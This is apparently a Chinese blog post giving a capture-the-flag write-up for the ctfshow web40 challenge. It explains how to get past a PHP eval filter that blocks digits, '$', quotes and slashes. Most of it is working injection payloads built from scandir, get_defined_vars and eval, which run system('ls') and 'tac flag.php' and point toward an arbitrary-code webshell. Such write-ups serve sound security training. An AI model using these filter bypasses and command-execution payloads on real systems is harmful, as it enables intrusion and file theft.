[ctfshow web入门] web40

信息收集

怎么一下子多这么多过滤啊,我以为跳过了好几题

这又能eval了,但是连$也不能用了

不能用. * ?,所以打不出fla*或者fla?????

不能用/,构造不出日志注入和伪协议包含

仔细观察,禁的是中文的括号,和英文括号没关系,所以我们用函数解决

php 复制代码
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

解题

前置知识:

一些php函数:

  • pos:函数返回数组中的当前元素的值
  • current:返回数组中的当前元素的值
  • end:将内部指针指向数组中的最后一个元素,并输出
  • next:将内部指针指向数组中的下一个元素,并输出
  • prev:将内部指针指向数组中的上一个元素,并输出
  • reset:将内部指针指向数组中的第一个元素,并输出
  • array_reverse:翻转数组,例如[1,2,3,4] ⇒ [4,3,2,1]
  • getcwd:获取当前目录
  • pos(localeconv()):老师傅们的骚操作,这能拿到一个.,替代当前目录
  • scandir:获取指定路径下的目录列表
  • get_defined_vars:函数返回由所有已定义变量所组成的数组
  • print_r:打印数组
  • var_dump:啥都能打印,只是看着比较乱

方法1

第一步,查目录

print_r:打印数组

var_dump:啥都能打印,数组,类,字符串,数值。缺点是看着很乱

php 复制代码
?c=print_r(scandir(getcwd()));

第二步,获取flag.php

本来想着[2]就能拿到了,但是数字被过滤了,这时候可以[TRUE+TRUE],但是[]都被过滤了

s 复制代码
Array ( [0] => . [1] => .. [2] => flag.php [3] => index.php )
使用了array_reverse后,变成
Array ( [0] => index.php [1] => flag.php [2] => .. [3] => . )
用next取第二个就是flag.php了

所以索引到flag.php使用如下代码

php 复制代码
?c=next(array_reverse(print_r(scandir(getcwd()))));

遗憾的是如果文件名在中间就没办法了。

我想到了使用pop或者unset来删除元素,可惜的是这些函数不会返回数组

同样的使用next也仅能够移动一次指针,返回的是数组里的值,而不是数组

这个数组是临时的,我们无法使用$生成变量来保存这个数组

第三步,拿到flag

show_source和highlight_file都一样

php 复制代码
?c=highlight_file(next(array_reverse(scandir(getcwd()))));

方法2

观察函数,找突破点

php 复制代码
?c=print_r(get_defined_vars)

能观察到我们写的print_r(get_defined_vars),再多写一个参数试试

php 复制代码
?c=print_r(get_defined_vars());&1=111111111

拿到这个参数

php 复制代码
?c=print_r(end(current(get_defined_vars())));&1=111111111

我们拿到这个参数了,end(current(get_defined_vars())) = $_GET[1]

获取flag

php 复制代码
?c=eval(end(current(get_defined_vars())));&1=system('ls');
?c=eval(end(current(get_defined_vars())));&1=system('tac flag.php');

拓展

结合方法1,可以构造payload:
end(current(get_defined_vars())) = flag.php

php 复制代码
?c=show_source(end(current(get_defined_vars())));&1=flag.php

其实这没有意义,我们想要的效果其实是eval($_POST[1])这样的木马,这能执行任意代码


web    目录    web

相关推荐
梦鱼19 分钟前
Vue 项目图标一把梭:Iconify 自用小记(含 TS/JS 双版本组件)
前端·javascript·vue.js
best66620 分钟前
Flex 与 Grid 的 order 参数:布局界的 "插队神器"
前端
小噔小咚什么东东20 分钟前
看到了很多次WebRTC,但是你真的需要它吗?
前端·webrtc
猫七先生21 分钟前
微信小程序一键登录可行性方案
前端·微信小程序
维他AD钙21 分钟前
前端开发 8 个非常实用小技巧:高效解决日常开发痛点
前端
光影少年26 分钟前
webpack和vite优化方案都有哪些
前端·webpack·node.js
给月亮点灯|27 分钟前
Vue基础知识-脚手架开发-初始化目录解析
前端·javascript·vue.js
kk不中嘞29 分钟前
Webpack 核心原理剖析
前端·webpack·node.js
Yvonne爱编码33 分钟前
简述ajax、node.js、webpack、git
前端·git·ajax·webpack·node.js·visual studio
周小码33 分钟前
CesiumJS详解:打造专业级Web 3D地球仪与地图的JavaScript库
前端·javascript·3d